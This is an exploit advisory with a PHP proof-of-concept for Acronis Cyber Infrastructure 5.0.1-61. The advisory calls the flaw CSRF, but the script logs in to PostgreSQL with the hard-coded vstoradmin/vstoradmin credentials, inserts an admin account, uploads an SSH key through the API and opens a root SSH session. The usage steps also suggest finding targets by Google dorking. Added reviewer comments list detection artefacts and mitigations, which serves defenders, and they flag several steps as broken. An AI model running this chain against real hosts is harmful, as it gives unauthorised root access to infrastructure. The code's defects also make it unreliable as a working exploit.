=============================================================================================================================================
| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add Admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engine.
[+] add new admin.
[+] Line 83 + 100 +138 + 202 set your target .
[+] save code as poc.php .
[+] Usage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept listing. It chains five steps: a direct PostgreSQL login,
 * creation of an admin account in the "keystone" database, a login to the web
 * API, an SSH public-key upload through the API, and an SSH login as root.
 *
 * Reviewer notes (defensive reading):
 * - The advisory title says CSRF, but no cross-site request appears in this
 *   class. The first step is pg_connect() in exploit(), using the hard-coded
 *   vstoradmin/vstoradmin credentials.
 * - Exposure as shown therefore depends on the database port being reachable
 *   from the network with those credentials unchanged. Restricting access to
 *   that port and checking the vendor's advisories for the affected build are
 *   the relevant mitigations.
 * - Artefacts worth hunting for: unexpected rows in the "user", "local_user",
 *   "password" and "assignment" tables; POSTs to /api/v2/login and
 *   /api/v2/<cluster id>/ssh-keys; root SSH logins with a previously unseen key.
 * - Several steps do not do what their comments say (flagged inline), so a
 *   failed run of this script is not evidence that a host is unaffected.
 */
class AcronisExploit {
// SSH connection handle; set by doSshLogin() on successful key authentication.
private $sshSocket;
// PostgreSQL connection handle; set by exploit() via pg_connect().
private $dbConn;
// Cluster id returned by getClusterId(); set in exploit().
private $clusterId;
/**
 * Sets all three handles to null; no connection is opened here.
 */
public function __construct() {
// Initialize default values
$this->sshSocket = null;
$this->dbConn = null;
$this->clusterId = null;
}
/**
 * Writes a new account directly into the identity tables over $this->dbConn,
 * bypassing the product's own user-management API.
 *
 * Rows are inserted into "user", "local_user" and "password", then one row
 * into "assignment". Every statement is built by string interpolation; the
 * interpolated values are generated by the caller in exploit().
 *
 * Detection: each of these INSERTs is a row that did not come through the
 * application, so auditing these four tables for accounts without a matching
 * administrative action is the direct check.
 *
 * @param string $username login name stored in "local_user"
 * @param string $userid   id stored in "user" and referenced by the other rows
 * @param string $password plaintext password; hashed with bcrypt before storage
 * @return bool false as soon as one of the first four statements fails, else true
 */
public function addAdminUser($username, $userid, $password) {
echo "Creating admin user $username with userid $userid\n";
// Insert new admin user into the user table
$resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");
if (!$resQuery) return false;
// Insert new admin user into the local_user table
// The next id is taken as MAX(id) + 1 from the existing rows.
$resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");
if (!$resQuery) return false;
$idLuser = pg_fetch_result($resQuery, 0, 0) + 1;
$resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");
if (!$resQuery) return false;
// Hash the password
$passwordHash = password_hash($password, PASSWORD_BCRYPT);
// The plaintext password and its hash are both printed to stdout here.
echo "Setting password $password with hash $passwordHash\n";
$today = date('Y-m-d');
$resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");
if (!$resQuery) return false;
// Assign admin roles
// NOTE(review): postgresQuery() returns the handle from pg_query(), not a
// column value, so these two variables hold result handles rather than ids
// when they are interpolated below. The "assignment" insert as written does
// not carry the looked-up ids, and its return value is not checked.
$idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");
$idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");
echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";
$this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");
echo "Successfully created admin user $username with password $password\n";
return true;
}
/**
 * Runs one statement on $this->dbConn with pg_query().
 *
 * @param string $query SQL text, sent as-is (no parameter binding)
 * @return mixed the pg_query() result handle, or false after printing
 *               pg_last_error() when the query fails
 */
private function postgresQuery($query) {
$result = pg_query($this->dbConn, $query);
if (!$result) {
echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";
return false;
}
return $result;
}
/**
 * Opens an SSH connection and authenticates with a key pair read from files.
 *
 * The port is fixed at 22 here; no port argument is accepted. The connection
 * is stored in $this->sshSocket only after authentication succeeds.
 *
 * Detection: a public-key login for the given user from a key that was added
 * moments earlier through the web API.
 *
 * @param string $ip     host to connect to
 * @param string $user   account name to authenticate as
 * @param array  $sshKey array with 'public' and 'private' file paths
 * @return bool true on successful authentication, false otherwise
 */
public function doSshLogin($ip, $user, $sshKey) {
$connection = ssh2_connect($ip, 22);
if (!$connection) {
echo "SSH connection failed\n";
return false;
}
if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {
$this->sshSocket = $connection;
return true;
} else {
echo "SSH authentication failed\n";
return false;
}
}
/**
 * POSTs a JSON username/password pair to the /api/v2/login endpoint.
 *
 * "target-uri" in the URL is a placeholder. Success is decided by a substring
 * search for '"code":200' in the response body, not by the HTTP status.
 * The curl handle is closed before returning, and no cookie option is set on
 * it, so nothing the server returns is kept for later requests in this listing.
 *
 * @param string $name account name
 * @param string $pwd  account password
 * @return bool true when the response body contains '"code":200'
 */
public function aciLogin($name, $pwd) {
$postData = json_encode([
'username' => $name,
'password' => $pwd
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return (strpos($response, '"code":200') !== false);
}
/**
 * GETs /api/v2/clusters and returns the id of the first entry under "data".
 *
 * This handle sets no authentication header or cookie option, so the request
 * carries nothing from aciLogin() in the code shown.
 *
 * @return mixed the value of data[0].id from the decoded JSON, or null when
 *               that key is absent
 */
public function getClusterId() {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
$data = json_decode($response, true);
if (isset($data['data'][0]['id'])) {
return $data['data'][0]['id'];
}
return null;
}
/**
 * Reserves a temporary file name for a private key and derives a ".pub" name
 * next to it, then returns both paths.
 *
 * NOTE(review): ssh2_genkeypair() does not appear to be a function of the PHP
 * ssh2 extension — confirm before treating this listing as runnable.
 *
 * @return array array with 'private' and 'public' file paths
 */
private function generateSshKeys() {
$privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');
$publicKey = $privateKey . '.pub';
ssh2_genkeypair($privateKey, $publicKey);
return [
'private' => $privateKey,
'public' => $publicKey
];
}
/**
 * POSTs a JSON body to /api/v2/<clusterId>/ssh-keys. The body carries $sshKey
 * under "key" and again inside an "event" object.
 *
 * Success is decided by a substring search for '"task_id"' in the response.
 * Detection: POSTs to this endpoint that do not match a planned
 * administrative change, especially from a recently created account.
 *
 * @param mixed $sshKey    value sent as the key; exploit() passes the public
 *                         key file path here
 * @param mixed $clusterId cluster id interpolated into the URL
 * @return bool true when the response body contains '"task_id"'
 */
public function uploadSshKey($sshKey, $clusterId) {
$postData = json_encode([
'key' => $sshKey,
'event' => [
'name' => 'SshKeys',
'method' => 'post',
'data' => [
'key' => $sshKey
]
]
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'X-Requested-With: XMLHttpRequest'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return (strpos($response, '"task_id"') !== false);
}
/**
 * Entry point: runs the whole chain in order and stops at the first failing
 * step, except that the return value of addAdminUser() is not checked.
 *
 * Of the five parameters only $rhost and $dbPort are read. $sshPort, $username
 * and $password are ignored: the database credentials are hard-coded in the
 * pg_connect() string and doSshLogin() always uses port 22.
 *
 * The precondition for everything below is the first line: a network-reachable
 * PostgreSQL listener that accepts the hard-coded vstoradmin/vstoradmin login
 * on the "keystone" database. Logging and alerting on remote logins for that
 * account is the earliest detection point.
 *
 * @param string $rhost    database and SSH host
 * @param int    $dbPort   PostgreSQL port
 * @param int    $sshPort  unused
 * @param string $username unused
 * @param string $password unused
 * @return bool true when every checked step succeeds, false otherwise
 */
public function exploit($rhost, $dbPort, $sshPort, $username, $password) {
// Connect to PostgreSQL
$this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");
if (!$this->dbConn) {
echo "Could not connect to PostgreSQL database\n";
return false;
}
// Add a new admin user
// The account name is 8 hex characters and the user id is 32 hex characters,
// which gives defenders a naming pattern to search the user tables for.
$newUsername = substr(md5(rand()), 0, 8);
$newPassword = substr(md5(rand()), 0, 16);
$userId = bin2hex(random_bytes(16));
$this->addAdminUser($newUsername, $userId, $newPassword);
// Login to Acronis
if (!$this->aciLogin($newUsername, $newPassword)) {
echo "Failed to login to Acronis\n";
return false;
}
// Get cluster ID
$this->clusterId = $this->getClusterId();
if (!$this->clusterId) {
echo "Failed to get cluster ID\n";
return false;
}
// Generate SSH keys
$sshKey = $this->generateSshKeys();
// Upload SSH public key
// What is passed is the 'public' entry, i.e. the file path returned by
// generateSshKeys(), not the file's contents.
if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {
echo "Failed to upload SSH public key\n";
return false;
}
// SSH Login
if (!$this->doSshLogin($rhost, 'root', $sshKey)) {
echo "SSH login failed\n";
return false;
}
echo "Exploit successful, SSH session established!\n";
return true;
}
}
// Example invocation. 'target-ip' is a placeholder. 6432 is passed as the
// PostgreSQL port; exploit() reads only the host and that port. The SSH port
// and the two trailing credential strings are ignored, because the database
// login is hard-coded inside exploit() itself.
// Defensive reading: the port and account named here are the ones to check
// for network exposure and unchanged credentials on the version in the title.
$exploit = new AcronisExploit();
$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================